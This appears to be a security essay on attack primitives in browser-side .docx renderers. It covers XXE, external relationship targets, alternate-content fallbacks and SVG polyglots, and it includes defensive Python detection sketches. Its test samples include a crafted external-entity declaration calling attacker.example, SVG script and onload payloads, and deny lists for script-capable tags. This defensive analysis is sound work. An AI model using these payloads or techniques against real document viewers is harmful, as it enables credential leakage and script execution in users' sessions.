The .docx in your webmail preview pane

Browser-side OOXML rendering - the family of libraries that take a .docx, .xlsx, or .pptx and project it pixel-for-pixel into a canvas or DOM without invoking the Office runtime - has become a soft target. The bug class is not new. The exposure surface is. Modern document viewers embedded in webmail, ticketing systems, EDR consoles, and collaboration suites parse the OOXML container client-side. The parser runs in the renderer process. The trust boundary that used to sit at the Office sandbox now sits at the browser. The browser was not built to enforce it. CVE-2023-36884 demonstrated the pattern at the Office layer. The browser-side equivalents are now landing.

The bug class is XML structure misinterpretation in a context that downstream treats as trusted markup. OOXML is a ZIP archive built to ISO/IEC 29500. Inside it: a [Content_Types].xml manifest, relationship parts under _rels/, the main document body, embedded media, and references to external resources. The specification is permissive. Parsers diverge on namespace handling, on alternate content blocks (mc:AlternateContent), on relationship target resolution, on the difference between Target and TargetMode="External". When a browser-side renderer normalises that structure into HTML or SVG for display, the divergence becomes a primitive. The renderer trusts the parser. The parser trusts the input. The input was attacker-controlled the moment it arrived as an email attachment.

The first primitive is XML External Entity injection. CWE-611. The OOXML body is XML. If the parser is constructed without explicit entity disabling - FEATURE_SECURE_PROCESSING together with disallow-doctype-decl in Java, defusedxml in Python, XmlResolver = null in .NET - a crafted document declares an entity that references a remote URL or a local file. On the server side this leaks credentials, SSRF-pivots into the internal network, or exfiltrates files. In a browser-side renderer the resolution happens from the user’s session. The renderer becomes a confused deputy. It fetches the entity over the user’s authenticated origin. NTLM hashes, in environments with WebDAV reachability, leave the host. T1187, forced authentication, executed without a single shell command.
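A minimal sketch of the fail-closed check, assuming a pre-render step that sees each XML part as raw bytes. The function name declares_dtd and the sample payload are illustrative, not taken from any renderer. It refuses any part that carries a DOCTYPE or ENTITY declaration, on the assumption that legitimate OOXML parts have no need for one. It is a byte-level heuristic and will also flag the marker inside comments or CDATA, which is acceptable when the goal is to fail closed.

```python
import re

# Matches a DOCTYPE or ENTITY declaration anywhere in the part.
_DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


def declares_dtd(xml_bytes: bytes) -> bool:
    """Return True if the raw XML part carries a DOCTYPE or ENTITY declaration."""
    # Dropping NUL bytes lets the same pattern match UTF-16 encoded parts
    # (crude, but cheap and biased toward rejecting).
    return _DTD_MARKER.search(xml_bytes.replace(b"\x00", b"")) is not None


# Hypothetical inputs for illustration only.
CRAFTED = b"""<?xml version="1.0"?>
<!DOCTYPE doc [<!ENTITY x SYSTEM "http://attacker.example/x">]>
<doc>&x;</doc>"""
CLEAN = b'<?xml version="1.0"?><doc>hello</doc>'

print(declares_dtd(CRAFTED))  # True
print(declares_dtd(CLEAN))    # False
```

Rejecting before parsing means the decision does not depend on how any particular XML parser is configured.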

The second primitive is the relationship part. The _rels/document.xml.rels file maps relationship IDs to targets. The OOXML spec allows external targets. Word resolves them on open. The Follina chain - CVE-2022-30190, CVSS 7.8 - used an external OLE object relationship that pulled a remote HTML file, which redirected to an ms-msdt: URI, which Word handed to MSDT, which executed PowerShell. Storm-0978 weaponised a related remote-content flaw, tracked as CVE-2023-36884, against Ukrainian and NATO-aligned targets in 2023. The browser-side equivalent does not need MSDT. It needs a renderer that fetches external relationship targets to produce a faithful render and a URL handler the browser will dispatch. The renderer issues the fetch. The handler is invoked. Code reaches a context the renderer was not supposed to influence. T1221, template injection, ported to the browser parser.

The third primitive is the alternate content fallback. mc:AlternateContent lets a document declare a primary rendering and a fallback. The Office runtime picks one. Browser-side renderers built for fidelity tend to walk both branches - primary for layout, fallback for compatibility. An attacker places benign content in the primary branch and the malicious construct in the fallback. Static analysis sandboxes that only render the primary report clean. The user’s renderer processes both. Detonation in user context. T1027.009, embedded payloads, applies directly.
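One way to collapse the two-branch ambiguity is to drop every fallback before rendering. The sketch below assumes the part has already been vetted for DTDs. The function name drop_fallbacks and the sample markup are illustrative. It removes each mc:Fallback child of an mc:AlternateContent element and reports how many were removed.

```python
import xml.etree.ElementTree as ET

MC_NS = "http://schemas.openxmlformats.org/markup-compatibility/2006"
ALT = f"{{{MC_NS}}}AlternateContent"
FALLBACK = f"{{{MC_NS}}}Fallback"


def drop_fallbacks(xml_text: str) -> tuple[str, int]:
    """Remove every mc:Fallback child of mc:AlternateContent; return (xml, count)."""
    root = ET.fromstring(xml_text)
    removed = 0
    # Materialise the list first so removal does not disturb iteration.
    for alt in list(root.iter(ALT)):
        for fb in alt.findall(FALLBACK):
            alt.remove(fb)
            removed += 1
    return ET.tostring(root, encoding="unicode"), removed


# Hypothetical document fragment: benign primary branch, hidden fallback.
SAMPLE = (
    f'<doc xmlns:mc="{MC_NS}"><mc:AlternateContent>'
    '<mc:Choice Requires="x"><p>benign</p></mc:Choice>'
    "<mc:Fallback><p>hidden</p></mc:Fallback>"
    "</mc:AlternateContent></doc>"
)

cleaned, count = drop_fallbacks(SAMPLE)
print(count)                # 1
print("hidden" in cleaned)  # False
```

The cost is fidelity on documents that genuinely rely on the fallback. The benefit is that the sandbox and the user's renderer see the same branch.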

The fourth primitive is the polyglot. A file that is a valid OOXML container and a valid something-else. ZIP polyglots are well documented. OOXML adds DrawingML, which embeds SVG, which embeds <script> blocks under namespaces the OOXML parser ignores but the renderer’s SVG handler executes. The boundary failure is the assumption that whatever the OOXML parser accepts is safe to pass to an SVG renderer. The SVG renderer in the browser obeys SVG semantics. Script executes in the document origin. From there the attack uses the origin’s cookies, fetches the origin’s APIs, and pivots inside the application that embedded the viewer. T1059.007, JavaScript execution, reached without a single line of code arriving as JavaScript.
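A rough pre-render check for the SVG case, assuming the embedded SVG has been extracted as text. The function name active_svg_constructs and the sample are illustrative, and this is a detector rather than a sanitiser. It compares local names only, so a script element hidden behind an unusual namespace prefix is still flagged.

```python
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignobject"}


def _local(name: str) -> str:
    """Strip a '{namespace}' prefix and lowercase the remainder."""
    return name.rsplit("}", 1)[-1].lower()


def active_svg_constructs(svg_text: str) -> list[str]:
    """List script-capable elements and on* handlers, ignoring namespaces."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"handler:{name}")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("href:javascript")
    return findings


# Hypothetical sample: the script sits under a non-default prefix for the SVG namespace.
SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:s="http://www.w3.org/2000/svg">'
    '<rect width="1" height="1" onload="alert(1)"/>'
    "<s:script>alert(2)</s:script>"
    "</svg>"
)

print(active_svg_constructs(SVG))  # ['handler:onload', 'element:script']
```

Any finding is grounds to refuse the image outright instead of handing it to the browser's SVG handler.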

Real-world exploitation of the OOXML family is established. Forest Blizzard, attributed to GRU Unit 26165, used CVE-2023-23397 through 2023. That bug is OOXML-adjacent rather than OOXML proper: a crafted Outlook reminder property points at an attacker-controlled UNC path and leaks the NTLM hash for relay. Storm-0978, the RomCom operator, used CVE-2023-36884 the same year. TA505 campaigns and Cobalt Strike loader chains have used template injection since 2019. The migration from desktop Office to browser-rendered Office in webmail and SaaS file viewers extends the same primitives to a renderer that lacks Protected View, lacks Mark of the Web inheritance, and lacks the macro trust prompt. The mitigations the Office team spent fifteen years building do not transfer.

In telemetry the gap is sharp. Desktop Office exploitation produces signal. Sysmon EID 1 records winword.exe spawning unexpected children. EID 11 catches the temp file write. EID 22 catches the suspicious DNS query. Defender for Endpoint surfaces Office-spawning-script under SuspiciousActivity. The detection stack is mature. Browser-rendered OOXML produces almost none of it. The parsing happens inside chrome.exe or msedge.exe. The fetch for an external entity is one more outbound HTTPS connection among thousands. The SVG-script execution is renderer-internal. No process spawn. No file write outside the browser cache. Sysmon does not see the boundary cross. EDR vendors instrument the browser process for known categories - credential theft, injection, COM abuse - but not for document-parser-derived primitives. The signal defenders relied on for fifteen years of Office exploitation is not produced.

Network-layer telemetry is partial. Egress to the entity URL is visible in proxy logs. The retrieval pattern - a fetch for a .dotx, .xml, or unusual MIME type from an unknown domain, originating from a browser session that just rendered an attachment - is correlatable if the SIEM has the join. Most do not. The browser does not annotate the fetch with the originating document. The proxy sees a generic GET. The correlation lives only in the renderer process, where no telemetry is emitted. The detection gap is the absence of provenance on browser-initiated subresource fetches triggered by document rendering.
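The join itself is simple once both event streams exist. The sketch below assumes two hypothetical record types: a RenderEvent that the embedding application would have to emit when a preview opens, and a ProxyEvent row from the egress proxy. The field names, the ten-second window, and the known-host allow-list are all assumptions for illustration.

```python
from dataclasses import dataclass

WINDOW_SECONDS = 10  # assumed correlation window


@dataclass(frozen=True)
class RenderEvent:  # hypothetical: emitted by the webmail app when a preview opens
    user: str
    ts: float
    attachment: str


@dataclass(frozen=True)
class ProxyEvent:  # hypothetical: one row of the proxy log
    user: str
    ts: float
    host: str


def correlate(renders, fetches, known_hosts):
    """Pair each unknown-host fetch with a preview the same user opened shortly before."""
    hits = []
    for f in fetches:
        if f.host in known_hosts:
            continue
        for r in renders:
            if r.user == f.user and 0 <= f.ts - r.ts <= WINDOW_SECONDS:
                hits.append((r.attachment, f.host))
    return hits


renders = [RenderEvent("alice", 100.0, "invoice.docx")]
fetches = [
    ProxyEvent("alice", 101.5, "mail.example"),      # known host, ignored
    ProxyEvent("alice", 102.0, "attacker.example"),  # inside the window
    ProxyEvent("bob", 102.0, "attacker.example"),    # no preview by this user
    ProxyEvent("alice", 500.0, "other.example"),     # outside the window
]

print(correlate(renders, fetches, {"mail.example"}))
# [('invoice.docx', 'attacker.example')]
```

A time-window join is a proxy for provenance, not provenance. It will pair unrelated fetches that happen to fall inside the window.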

The detection engineering that closes part of the gap is browser-process telemetry enrichment. Chromium’s DevTools Protocol exposes Network.requestWillBeSent with initiator stack traces. An EDR that hooks the renderer through an enterprise-managed extension, for example via the chrome.debugger API, can capture the initiator of each subresource fetch. Fetches initiated from a document-rendering library - identifiable by the script URL of the initiator and the document MIME type of the page that triggered them - correlate to document-driven egress. The control is non-trivial. It requires extension deployment, renderer instrumentation, and a SIEM schema that carries initiator provenance. Few enterprises operate it. The vendors that ship browser extensions for credential theft detection have the hook but not the rule.
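The rule side of that hook can be sketched as a filter over captured Network.requestWillBeSent parameters. The initiator, stack, callFrames, and parent fields follow the DevTools Protocol event shape. The marker substrings, the sample event, and the function names are assumptions for illustration, and real bundles may rename or inline the library.

```python
# Assumed substrings that identify a rendering library's script URL.
RENDER_LIB_MARKERS = ("docx-preview", "mammoth")


def initiator_urls(event_params: dict) -> list[str]:
    """Collect script URLs from the initiator, following async parent stacks."""
    initiator = event_params.get("initiator", {})
    urls = [initiator["url"]] if initiator.get("url") else []
    stack = initiator.get("stack")
    while stack:
        urls.extend(f["url"] for f in stack.get("callFrames", []) if f.get("url"))
        stack = stack.get("parent")
    return urls


def from_render_library(event_params: dict) -> bool:
    """True if any initiator frame belongs to a watched rendering library."""
    return any(m in u for u in initiator_urls(event_params) for m in RENDER_LIB_MARKERS)


# Hypothetical captured event, trimmed to the fields the rule reads.
EVENT = {
    "requestId": "1000.1",
    "request": {"url": "https://attacker.example/t.dotx", "method": "GET"},
    "initiator": {
        "type": "script",
        "stack": {
            "callFrames": [
                {
                    "functionName": "loadPart",
                    "url": "https://mail.example/static/docx-preview.min.js",
                    "lineNumber": 1,
                    "columnNumber": 2,
                }
            ]
        },
    },
}

print(from_render_library(EVENT))  # True
```

The output of this filter is the provenance field the SIEM schema would need to carry alongside the proxy record.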

The patch boundary depends on the renderer. The libraries in this space - Mammoth, docx-preview, SheetJS, and the proprietary engines inside major SaaS viewers - patch on their own cadences. CVE assignment for client-side library bugs is inconsistent. Many issues land as silent fixes in minor releases without an advisory. The residual exposure post-patch is the long tail of embedded viewers in vendor products that pin a vulnerable library version. Even after the underlying library ships a fix, the SaaS that bundled it ships on its own deploy cycle. Enterprise procurement of document-rendering features rarely tracks the transitive dependency. The CVE that closes the bug in the library does not close the bug in the product that shipped the library six months ago.
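Tracking the transitive dependency is mechanical when a lockfile is available. The sketch below assumes an npm package-lock.json in the version 2 or 3 layout, where a top-level packages object is keyed by node_modules paths. The watched names are the npm package names for the libraries above, with xlsx standing in for SheetJS. The sample lockfile and its version numbers are invented placeholders, not known-vulnerable releases.

```python
import json

WATCHED = {"mammoth", "docx-preview", "xlsx"}  # xlsx is the SheetJS npm package name


def pinned_renderers(lock_text: str) -> dict[str, set[str]]:
    """Map each watched package to every version pinned anywhere in the tree."""
    found: dict[str, set[str]] = {}
    for path, meta in json.loads(lock_text).get("packages", {}).items():
        # Nested installs look like node_modules/a/node_modules/xlsx.
        name = path.rsplit("node_modules/", 1)[-1]
        if name in WATCHED and "version" in meta:
            found.setdefault(name, set()).add(meta["version"])
    return found


# Hypothetical lockfile with placeholder versions.
LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "viewer-app"},
        "node_modules/mammoth": {"version": "0.0.1"},
        "node_modules/report-kit/node_modules/xlsx": {"version": "0.0.2"},
        "node_modules/left-pad": {"version": "0.0.3"},
    },
})

print(pinned_renderers(LOCK))
```

The same listing, compared against the library's release notes, shows whether a silent fix has actually reached the product.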

What still applies post-patch is the architectural condition. A browser-side renderer that aims for pixel fidelity must process the full OOXML structure. Full structure means full attack surface. Entity disabling, external-target blocking, alternate content branching restrictions, and SVG sanitisation through a strict allow-list are necessary controls. None of them are default in the libraries shipping today. The renderer that fails closed - strips relationships with external targets, refuses entities, drops mc:AlternateContent fallbacks, and routes SVG through DOMPurify with USE_PROFILES: {svg: true} and FORBID_TAGS: ['script', 'foreignObject'] - sacrifices fidelity. The renderer that preserves fidelity preserves the primitive. The trade is structural. The bug is the assumption that pixel-faithful rendering of an attacker-controlled document is a function a browser can perform safely. It is not.
